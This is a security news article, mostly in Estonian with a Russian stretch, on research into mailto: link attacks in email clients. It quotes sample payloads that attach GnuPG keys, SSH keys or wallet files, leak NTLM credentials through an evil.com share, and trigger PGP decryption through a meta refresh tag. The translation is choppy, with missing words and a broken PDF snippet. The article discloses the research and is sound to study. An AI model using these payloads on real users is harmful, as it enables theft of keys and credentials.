Ruhr-University Bochumi teadlased (Saksamaa) () e-posti klientide käitumine linkide «mailto:» töötlemisel laienevate parameetritega. Viis kahekümnest vaadeldud e-posti kliendist olid haavatavad rünnaku suhtes, mis manipuleeris ressursside asendamisega parameetri «attach» kaudu. Veel kuus e-posti klienti olid haavatavad PGP ja S/MIME võtmete vahetamise rünnaku suhtes ning kolm klienti osutusid haavatavaks krüpteeritud sõnumite sisu väljavõtmise rünnaku suhtes.
Lingid «» kasutatakse e-posti kliendi automaatseks avamiseks, et kirjutada kirja antud lingis märgitud saajale. Lisaks e-posti aadressile saab lingi koostises määrata ka täiendavaid parameetreid, näiteks kirja teema ja tüüpilise sisu mall. Eeskujuks olev rünnak manipuleerib parameetriga «attach», mis võimaldab luua kirja ka manuse.
Post clients Thunderbird, GNOME Evolution (CVE-2020-11879), KDE KMail (CVE-2020-11880), IBM/HCL Notes (CVE-2020-4089) ja Pegasus Mail on haavatavad lihtsale rünnakule, mis võimaldab automaatselt kinnitada igasuguseid kohalikke faile, kasutades linki kujul «mailto:?attach=faili_teel». Fail kinnitatakse ilma hoiatuse kuvamiseta, mistõttu kasutaja võib, kui talle ei pöörata erilist tähelepanu, mitte märgata, et kiri saadetakse koos manusega.
Näiteks lingi kujul «mailto:?to=user@example.com&subject=Pealkiri&body=Tekst&attach=~/.gnupg/secring.gpg» abil on võimalik kinnitada GnuPG suletud võtmed kirja. Samuti on võimalik saata krüptorahakottide sisu (~/.bitcoin/wallet.dat), SSH-võtmed (~/.ssh/id_rsa) ja muid kasutajale ligipääsetavaid faile. Veelgi enam, Thunderbird võimaldab kinnitada faile rühmana mustri järgi, kasutades konstruktsioone, nagu «attach=/tmp/*.txt».
Lisaks kohalikele failidele suudavad mõned e-posti kliendid töödelda linke võrguhoidlatest ja teid IMAP-serveris. Eriti võimaldab IBM Notes edastada faili võrgu kataloogist, kui töödeldakse linke vormingus «attach=\\evil.com\dummyfile», samuti haarata NTLM autentimise parameetreid, saates lingi SMB-serverisse, mis on ründaja kontrolli all (päring saadetakse kasutaja praeguste autentimise parameetritega).
Thunderbird töötleb edukaid päringuid vormingus «attach=imap:///fetch>UID>/INBOX>1/», mis võimaldavad manustada sisu IMAP-serveri kaustadest. Sel juhul dekrüpteeritakse IMAP-ist saadud kirjad, mis on krüpteeritud OpenPGP ja S/MIME meetoditega, automaatselt e-posti kliendi poolt enne saatmist. Thunderbirdi arendajad olid probleemist veebruaris, ja versioonis on probleem juba lahendatud (Thunderbirdi versioonid 52, 60 ja 68 jäävad siiski haavatavaks).
Старые версии Thunderbird оказались уязвимы и для двух других вариантов атаки на PGP и S/MIME, предложенных исследователями. В частности, к Thunderbird, а также к OutLook, PostBox, eM Client, MailMate и R2Mail2 оказалась применима атака по замене ключей, вызванная тем, что почтовый клиент автоматически импортирует и устанавливает новые сертификаты, передаваемые в сообщениях S/MIME, что позволяет атакующему организовать подмену уже сохранённых у пользователя открытых ключей.
Вторая атака, которой подвержены Thunderbird, PostBox и MailMate, манипулирует особенностями механизма автосохранения черновиков сообщений и позволяет при помощи параметров mailto инициировать расшифровку зашифрованных сообщений или добавление цифровой подписи для произвольных сообщений, с последующей передачей результата на IMAP-сервер атакующего. Шифротекст при данной атаке передаётся через парметр «body», а для инициирования обращения к IMAP-серверу атакующего применяется тег «meta refresh». Например: ‘<meta http-equiv=»refresh» content=»60; URL=mailto:?body=——BEGIN PGP MESSAGE——[…]——END PGP MESSAGE——«>’
Automaatseks «mailto:» linkide töötlemiseks ilma kasutaja sekkumiseta võivad olla kasutusel spetsiaalselt kujundatud PDF-dokumendid — OpenAction PDF-is võimaldab automaatselt avada mailto töötlejat dokumenti avades:
%PDF-1.5
1 0 obj
<>
endobj
2 0 obj
<>
endobj
Allikas: opennet.ru
